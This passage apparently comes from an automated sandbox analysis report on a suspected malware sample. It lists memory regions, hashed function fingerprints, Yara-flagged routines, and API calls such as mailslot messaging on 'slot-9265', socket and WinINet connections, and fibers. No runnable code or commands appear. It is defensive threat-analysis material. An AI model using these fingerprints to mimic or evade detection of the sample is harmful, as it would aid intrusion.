                                  • Associated: 00000000.00000002.3274119468.00007FF7AD095000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274134501.00007FF7AD098000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274149052.00007FF7AD09C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7ad040000_1.jbxd
                                  Similarity
                                  • API ID: malloc$ExceptionFilterSleepUnhandledmemcpystrlen
                                  • String ID:
                                  • API String ID: 3806033187-0
                                  • Opcode ID: 8091a641eeb92fa861bdf09432316f056679052e5828dde474993ae9bd8e7f2b
                                  • Instruction ID: 5dd0bf325984519a53344510f1c2121e1324b10b5b4df9691ceb0d59c85fa807
                                  • Opcode Fuzzy Hash: 8091a641eeb92fa861bdf09432316f056679052e5828dde474993ae9bd8e7f2b
                                  • Instruction Fuzzy Hash: 94513EB1E4E60285F650BF16E458A7BA3A2EF94780FC64435ED1C873B5EE3CE4618361

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: NameSocketUser_snprintfmallocstrrchr
                                  • String ID:
                                  • API String ID: 1789932928-0
                                  • Opcode ID: 2e9ec8b2910e25878f9df8f559a5a89517a6a7cf57a35c6dffffe13ea40c4c2d
                                  • Instruction ID: 7d35e014aa16d14a9ae9b80bbc600fed4689e0fa1d6ddb2006fa1eaf122ffa26
                                  • Opcode Fuzzy Hash: 2e9ec8b2910e25878f9df8f559a5a89517a6a7cf57a35c6dffffe13ea40c4c2d
                                  • Instruction Fuzzy Hash: 03516630B1CA080FEB58AB6CA45E779B3D6E78D314F10552DE49BC3293DA7DD8828752

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 283 2b66a0bfc3e-2b66a0bfc5d 284 2b66a0bfc5f-2b66a0bfc6d 283->284 285 2b66a0bfc74-2b66a0bfc77 284->285 286 2b66a0bfc6f-2b66a0bfc72 284->286 285->284 287 2b66a0bfc79-2b66a0bfc7a 285->287 286->285 288 2b66a0bfca7-2b66a0bfcb1 286->288 289 2b66a0bfc7c-2b66a0bfca3 287->289 290 2b66a0bfcb3-2b66a0bfcb4 288->290 291 2b66a0bfd0c-2b66a0bfd0e call 7ff7ad041603 288->291 289->289 292 2b66a0bfca5 289->292 293 2b66a0bfcb6-2b66a0bfcbd 290->293 296 2b66a0bfd10-2b66a0bfd1a 291->296 292->284 294 2b66a0bfcf5-2b66a0bfd0a 293->294 295 2b66a0bfcbf 293->295 294->291 294->293 297 2b66a0bfcc1-2b66a0bfcf3 295->297 298 2b66a0bfd75-2b66a0bfd76 296->298 299 2b66a0bfd1c-2b66a0bfd1d 296->299 297->294 297->297 300 2b66a0bfd79-2b66a0bfd87 298->300 301 2b66a0bfd1f-2b66a0bfd26 299->301 302 2b66a0bfd8e-2b66a0bfd91 300->302 303 2b66a0bfd89-2b66a0bfd8c 300->303 304 2b66a0bfd5e-2b66a0bfd73 301->304 305 2b66a0bfd28 301->305 302->300 307 2b66a0bfd93-2b66a0bfd94 302->307 303->302 306 2b66a0bfdc1-2b66a0bfdd5 303->306 304->298 304->301 308 2b66a0bfd2a-2b66a0bfd5c 305->308 309 2b66a0bfd96-2b66a0bfdbd 307->309 308->304 308->308 309->309 310 2b66a0bfdbf 309->310 310->300
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 88e8bec169d31fc803aeef05fed04f98ffb8ac2501b92b4af572ff67ccb03544
                                  • Instruction ID: 8ebbcc34ad92fe4d0be985db08ebc2932f34f4c0aa50b06b453a903247402fef
                                  • Opcode Fuzzy Hash: 88e8bec169d31fc803aeef05fed04f98ffb8ac2501b92b4af572ff67ccb03544
                                  • Instruction Fuzzy Hash: CD512834604A458FC71CCE1C86C9A3177DAFB95309B15937DD9ABCB267CA35DC82C680

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3274069045.00007FF7AD041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7AD040000, based on PE: true
                                  • Associated: 00000000.00000002.3274052467.00007FF7AD040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274088482.00007FF7AD049000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274119468.00007FF7AD095000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274134501.00007FF7AD098000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274149052.00007FF7AD09C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7ad040000_1.jbxd
                                  Similarity
                                  • API ID: File$CloseCreateHandleSleepWrite
                                  • String ID: \\.\mailslot\slot-9265
                                  • API String ID: 1443029356-1114527691
                                  • Opcode ID: 12c8937509f94b184e0ce9ffa8a90910c0d02dd3be413883b3163e6873a6d272
                                  • Instruction ID: def1afecfa26e5f7d38ad533ab25d7e16f391622e2ea0976179236a36e92ba50
                                  • Opcode Fuzzy Hash: 12c8937509f94b184e0ce9ffa8a90910c0d02dd3be413883b3163e6873a6d272
                                  • Instruction Fuzzy Hash: D0110471B0D60246F364AB11B844A67F662EB98BA0F448338EE6D43BE4EF3CD4158710

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _snprintf$AvailableDataInternetQuery_errno_invalid_parameter_noinfo
                                  • String ID:
                                  • API String ID: 2765704423-0
                                  • Opcode ID: 70f0b2ca5af4e20061d35c5bca96a8600da3e808857c3dcbcfbd5e76383eb985
                                  • Instruction ID: 0aace4d4b44730ff14a54a1d8f4d38276e776fc0132085f5071f66ceb6942c85
                                  • Opcode Fuzzy Hash: 70f0b2ca5af4e20061d35c5bca96a8600da3e808857c3dcbcfbd5e76383eb985
                                  • Instruction Fuzzy Hash: 0A71A831A187088FEB54EB18D88D7AA73E9FB98315F00462EE45BC3192DF3DE9458781

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: IoctlSocketclosesocket
                                  • String ID: _Cy
                                  • API String ID: 3445158922-1085951347
                                  • Opcode ID: a92242532cdd76a831474aee6315f72e21cb2840c0ed84f4820b0f016089d1a4
                                  • Instruction ID: 4151c107d05d5a2df55f8ba85df4bda54e724eb349d36cc123ab9bcf210b5461
                                  • Opcode Fuzzy Hash: a92242532cdd76a831474aee6315f72e21cb2840c0ed84f4820b0f016089d1a4
                                  • Instruction Fuzzy Hash: 82317830A1CA484BDB58DF28958C76AB7E5FBE8319F110B3EE85EC3291DB3AC5418741

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3274069045.00007FF7AD041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7AD040000, based on PE: true
                                  • Associated: 00000000.00000002.3274052467.00007FF7AD040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274088482.00007FF7AD049000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274119468.00007FF7AD095000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274134501.00007FF7AD098000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274149052.00007FF7AD09C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7ad040000_1.jbxd
                                  Similarity
                                  • API ID: Fiber$ConvertCreateDeleteSwitchThread
                                  • String ID:
                                  • API String ID: 300894985-0
                                  • Opcode ID: 19e0da33993c44b7506bf1086dbb16ea77694587ff193bf6245d114c650904a1
                                  • Instruction ID: b8cd0bb7237c40cdc5cf8f396067832da3abd5f1fb96e47e3dd069a717cc6ab5
                                  • Opcode Fuzzy Hash: 19e0da33993c44b7506bf1086dbb16ea77694587ff193bf6245d114c650904a1
                                  • Instruction Fuzzy Hash: 38213696E4EA4245F701AB20B8043BAA322DF11BA0F8A5138DD1D033F1FD3DB0158321

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3274069045.00007FF7AD041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7AD040000, based on PE: true
                                  • Associated: 00000000.00000002.3274052467.00007FF7AD040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274088482.00007FF7AD049000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274119468.00007FF7AD095000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274134501.00007FF7AD098000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274149052.00007FF7AD09C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7ad040000_1.jbxd
                                  Similarity
                                  • API ID: Heap$AllocCreate$Thread
                                  • String ID:
                                  • API String ID: 393545303-0
                                  • Opcode ID: 714f174b13a6f866eb7e86233ea32842d6690c75935e25f6350bbcd674f99e5d
                                  • Instruction ID: accf7b8ebd3cdb58ff205aee2f6f366f6731411b843a14c7fd6d3a393a22c981
                                  • Opcode Fuzzy Hash: 714f174b13a6f866eb7e86233ea32842d6690c75935e25f6350bbcd674f99e5d
                                  • Instruction Fuzzy Hash: 06110252E5E65102F314AB7B78089B7A6A2DBDEBD4F4AC134ED4D47775FC3C90018210

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3274069045.00007FF7AD041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7AD040000, based on PE: true
                                  • Associated: 00000000.00000002.3274052467.00007FF7AD040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274088482.00007FF7AD049000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274119468.00007FF7AD095000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274134501.00007FF7AD098000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274149052.00007FF7AD09C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7ad040000_1.jbxd
                                  Similarity
                                  • API ID: FileInfoMailslotReadSleepmalloc
                                  • String ID: \\.\mailslot\slot-9265
                                  • API String ID: 873109203-1114527691
                                  • Opcode ID: 335d62575feb6f285d72d406690dba11f31996b999c028d0e53523e56cd6be43
                                  • Instruction ID: 3bca99212fcc17e2b9a9433cc19183a267a185f1beb8d16d8a9a127f063beab6
                                  • Opcode Fuzzy Hash: 335d62575feb6f285d72d406690dba11f31996b999c028d0e53523e56cd6be43
                                  • Instruction Fuzzy Hash: DEF0F66274D1424AE614BB22FD018ABA360DF84B94FC94031DF5D933A1ED3CF4528750

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$ConnectOpen
                                  • String ID:
                                  • API String ID: 2790792615-0
                                  • Opcode ID: 44eed23d63fb0890720a6991a3b8969036aed2aac8f16f8d3a2fefc079dafb55
                                  • Instruction ID: ee2b8b5092da93e44a40c2750a62154fe6bfb27ae746c9d2bdde74a3e5ef3fa0
                                  • Opcode Fuzzy Hash: 44eed23d63fb0890720a6991a3b8969036aed2aac8f16f8d3a2fefc079dafb55
                                  • Instruction Fuzzy Hash: 3751D730A186044FEB48EF58D89D7B9B3E9FB88305F10456DE057C3292DB3DD9468782

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 244 7ff7ad04186a-7ff7ad041892 245 7ff7ad041896-7ff7ad0418b3 GetMailslotInfo 244->245 246 7ff7ad0418e7-7ff7ad0418f8 245->246 247 7ff7ad0418b5-7ff7ad0418c1 245->247 247->246 248 7ff7ad0418c3-7ff7ad0418e5 ReadFile 247->248 248->245
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3274069045.00007FF7AD041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7AD040000, based on PE: true
                                  • Associated: 00000000.00000002.3274052467.00007FF7AD040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274088482.00007FF7AD049000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274119468.00007FF7AD095000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274134501.00007FF7AD098000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274149052.00007FF7AD09C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7ad040000_1.jbxd
                                  Similarity
                                  • API ID: FileInfoMailslotRead
                                  • String ID:
                                  • API String ID: 1548164602-0
                                  • Opcode ID: ee7fb3228befc32374cd89cdc1299add42a9164724472b155f9572456517ccb7
                                  • Instruction ID: d66dc463fefe63ace8a230fd44701edccc8d69b2256c81d7a6846f3ee6b6f8ed
                                  • Opcode Fuzzy Hash: ee7fb3228befc32374cd89cdc1299add42a9164724472b155f9572456517ccb7
                                  • Instruction Fuzzy Hash: 22017C73A2E6018AD794DB26F84446BB3A1FB88B94F459135BE5E82768EE3CC410CB10

                                  Control-flow Graph

                                  APIs
                                  • GetCurrentProcess.KERNEL32(?,?,-00000008,00000001,00007FF7AD0412EE,?,?,?,00007FF7AD0413E6), ref: 00007FF7AD0480F0
                                  • WaitForSingleObject.KERNEL32(?,?,-00000008,00000001,00007FF7AD0412EE,?,?,?,00007FF7AD0413E6), ref: 00007FF7AD0480FA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3274069045.00007FF7AD041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7AD040000, based on PE: true
                                  • Associated: 00000000.00000002.3274052467.00007FF7AD040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274088482.00007FF7AD049000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274119468.00007FF7AD095000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274134501.00007FF7AD098000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274149052.00007FF7AD09C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7ad040000_1.jbxd
                                  Similarity
                                  • API ID: CurrentObjectProcessSingleWait
                                  • String ID:
                                  • API String ID: 256417062-0
                                  • Opcode ID: 509677881fd4968d315430fb96a9dcbb5e2356e6a5bd1bf6c8d1e8ae495e8b99
                                  • Instruction ID: b18edd9c6d4b88934a61b9fe0246a793ac51c81dc9e6725e55ecd72c83c80b6b
                                  • Opcode Fuzzy Hash: 509677881fd4968d315430fb96a9dcbb5e2356e6a5bd1bf6c8d1e8ae495e8b99
                                  • Instruction Fuzzy Hash: A0D0C750E1F55650F554773168194BB5615CF54B80F9A4536ED0D133F1BD5CE4624321

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 255 2b66a0c5fa4-2b66a0c5fc0 256 2b66a0c5fc2-2b66a0c5fc5 255->256 257 2b66a0c602a call 2b66a0c7db8 255->257 258 2b66a0c602f-2b66a0c6040 256->258 259 2b66a0c5fc7-2b66a0c5fd2 call 2b66a0c7d88 256->259 257->258 263 2b66a0c5fd4-2b66a0c5fd7 259->263 264 2b66a0c6020-2b66a0c6023 call 2b66a0bba74 259->264 263->264 266 2b66a0c5fd9-2b66a0c5fee 263->266 267 2b66a0c6028 264->267 266->264 269 2b66a0c5ff0-2b66a0c5ff8 266->269 267->258 270 2b66a0c5ffa-2b66a0c600b VirtualFree 269->270 271 2b66a0c600d-2b66a0c6015 269->271 270->264 271->264 272 2b66a0c6017-2b66a0c6018 271->272 272->264
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeVirtual
                                  • String ID:
                                  • API String ID: 1263568516-0
                                  • Opcode ID: 035e5d67093643cf14d525f5db75048425cc0484b18a4d78cef9a8779f303f6a
                                  • Instruction ID: 30200d5aa3185a8c24e2662e2a03b73e1345a604950930ef43dc817dcf7f01f9
                                  • Opcode Fuzzy Hash: 035e5d67093643cf14d525f5db75048425cc0484b18a4d78cef9a8779f303f6a
                                  • Instruction Fuzzy Hash: 6C11C630D08B095BEBB0AB18989C77A7BE9EB94304F20552DE05BD2281CB3EC8C08651
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _errnowrite_multi_char$Locale_invalid_parameter_noinfowrite_charwrite_string$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                  • String ID: $@
                                  • API String ID: 2950348734-1077428164
                                  • Opcode ID: a13eea343652d2125984793768277ab6f7899e45437fecb40c09c16223446c0b
                                  • Instruction ID: 007d25a6f91cb724cc2c1cfa44cbe6cbe722159e574878e837bc2fc3ba2654f5
                                  • Opcode Fuzzy Hash: a13eea343652d2125984793768277ab6f7899e45437fecb40c09c16223446c0b
                                  • Instruction Fuzzy Hash: 37622D30D98B598BFB6C9A58C44D3B9B7D9FB95308F24022DD4A7C31D2D73ED8828661
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _errnowrite_multi_char$Locale_invalid_parameter_noinfowrite_charwrite_string$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                  • String ID:
                                  • API String ID: 2950348734-3916222277
                                  • Opcode ID: c088f05b1c41bc5f40f79eacfff539743c0c701c9f0e97b8461aafc53f4e8f13
                                  • Instruction ID: 323cc296920f3ffcef5c7562428bcbd2b302d1a73fabbe2854c01a907e73a870
                                  • Opcode Fuzzy Hash: c088f05b1c41bc5f40f79eacfff539743c0c701c9f0e97b8461aafc53f4e8f13
                                  • Instruction Fuzzy Hash: DF621830D58B498AF7688B5CC49D3B9B7E9FB95308F24421DD4A7C31D2D73EE8828652
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _snprintf$_errno_invalid_parameter_noinfo
                                  • String ID:
                                  • API String ID: 3442832105-0
                                  • Opcode ID: b0045474d1749a7287ab64cdf2928e642e754940ba2aba6c48bf8ce747efe894
                                  • Instruction ID: 44842f840de2b14590e634a2e2d4f2d09114e386712b821aaac0470923d1910a
                                  • Opcode Fuzzy Hash: b0045474d1749a7287ab64cdf2928e642e754940ba2aba6c48bf8ce747efe894
                                  • Instruction Fuzzy Hash: 4952E62091CD859BF759AB2CD44A7E5F3E4FFA8309F405218D996C3162EB3EE5C28781
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3274069045.00007FF7AD041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7AD040000, based on PE: true
                                  • Associated: 00000000.00000002.3274052467.00007FF7AD040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274088482.00007FF7AD049000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274119468.00007FF7AD095000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274134501.00007FF7AD098000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274149052.00007FF7AD09C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7ad040000_1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $ $Infinity$NaN
                                  • API String ID: 0-3274152445
                                  • Opcode ID: 7d5a14f5dedcebecef56494e64d59fb4232824489aecee340d46cd8850546201
                                  • Instruction ID: ca8ec234a0e9f1d4915a0dd0f71c1ac0f83eef35536ea8ab94c8c4435e620a67
                                  • Opcode Fuzzy Hash: 7d5a14f5dedcebecef56494e64d59fb4232824489aecee340d46cd8850546201
                                  • Instruction Fuzzy Hash: 56D2D8B2A1D6818BE711DF259008B6BF791FB85780F914135EE4A87B69FB3DE4508F10
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _initp_misc_winsig
                                  • String ID:
                                  • API String ID: 2710132595-0
                                  • Opcode ID: 8cbed0600e1a0cd3663791481dac497ddfdb5fe5119e382b5240cae51cc170ff
                                  • Instruction ID: 1e09e9657285e378c227fa7c1dcee3abc09b95c0931c19022da04240fa5f4402
                                  • Opcode Fuzzy Hash: 8cbed0600e1a0cd3663791481dac497ddfdb5fe5119e382b5240cae51cc170ff
                                  • Instruction Fuzzy Hash: 7FA1F731619A099FFF44FFB5E888AAA37A2F768301711893A900AC3174DFBCD585CB51
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3274069045.00007FF7AD041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7AD040000, based on PE: true
                                  • Associated: 00000000.00000002.3274052467.00007FF7AD040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274088482.00007FF7AD049000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274119468.00007FF7AD095000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274134501.00007FF7AD098000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274149052.00007FF7AD09C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7ad040000_1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .
                                  • API String ID: 0-248832578
                                  • Opcode ID: dc7c95912ea179b4376ebdfd1fe7d6f82869dd945337f08c514ca93ba6913bec
                                  • Instruction ID: d262d2cee109122dd20d82b272ba5c7bc8d3b9a825a3e65a6a4a7f349c6c2b8b
                                  • Opcode Fuzzy Hash: dc7c95912ea179b4376ebdfd1fe7d6f82869dd945337f08c514ca93ba6913bec
                                  • Instruction Fuzzy Hash: 65B1F8E6E1E64646E759AE21911CB7BE251FB40B84FC68130DE0F0B7D5FEACE9108720
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b964d68e6518deaae8e71beb8172e02235f27dbd0a2c1c82e9933f31d250ba5e
                                  • Instruction ID: 940018a7ca294743e9e1bdbefee027ab406bddcf94c0fd2f9e9b50429fc78e4d
                                  • Opcode Fuzzy Hash: b964d68e6518deaae8e71beb8172e02235f27dbd0a2c1c82e9933f31d250ba5e
                                  • Instruction Fuzzy Hash: 4481C1346149498FD75CDE2CC58DB3173E9FB55309F2482ADD56ACB2A6CB3AD882C640
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 17d2024319736c82b3fb213a99edabd88fd33fc2dd5ac40e50a907bb907351a9
                                  • Instruction ID: a20622aa6ca48a525afd804a282e5a0b2a7511a3d50a52b32fa5582c452e9864
                                  • Opcode Fuzzy Hash: 17d2024319736c82b3fb213a99edabd88fd33fc2dd5ac40e50a907bb907351a9
                                  • Instruction Fuzzy Hash: 5B620A312286558FD31CCB1CC5B1B7AB7E1FB8A340F44896DE28BCB692C639D945CB91
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3273686311.000002B66A0B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002B66A0B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b66a0b0000_1.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 337786be687ad5e8f5ffca3d815a0aab4912f658854966903adbd25a668e3634
                                  • Instruction ID: ece59c1b1ddd8d00d8b7fd54d2cbdb22d8fc4410d32f1545a37d947869ab5d3c
                                  • Opcode Fuzzy Hash: 337786be687ad5e8f5ffca3d815a0aab4912f658854966903adbd25a668e3634
                                  • Instruction Fuzzy Hash: 4952ED312286558FD31CCF1CC5A1E7AB7E1FB8D340F448A6DE28ACB692C639D545CB91
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3274134501.00007FF7AD098000.00000004.00000001.01000000.00000003.sdmp, Offset: 00007FF7AD040000, based on PE: true
                                  • Associated: 00000000.00000002.3274052467.00007FF7AD040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274069045.00007FF7AD041000.00000020.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274088482.00007FF7AD049000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274119468.00007FF7AD095000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.3274149052.00007FF7AD09C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7ad040000_1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e5c8e24b3c38e2cdd38f8af6b1f6a6fbc394cda27b362a4a28bbdb5c3412e4a7
                                  • Instruction ID: e19295f4a2df90ed8788476972b8570e7679096ea9846d468fb6eba41e5cfe02
                                  • Opcode Fuzzy Hash: e5c8e24b3c38e2cdd38f8af6b1f6a6fbc394cda27b362a4a28bbdb5c3412e4a7
                                  • Instruction Fuzzy Hash: 73E0658BD0FEC305F151D5641D2611A5BD2DF13934B4E937EAE38022E2790678115221
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.3274069045.00007FF7AD041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7AD040000, based on PE: true
                                  • Associated: 00000000.00000002.3274052467.00007FF7AD040000.00000002.00000001.01000000.00000003.sdmpDownload File
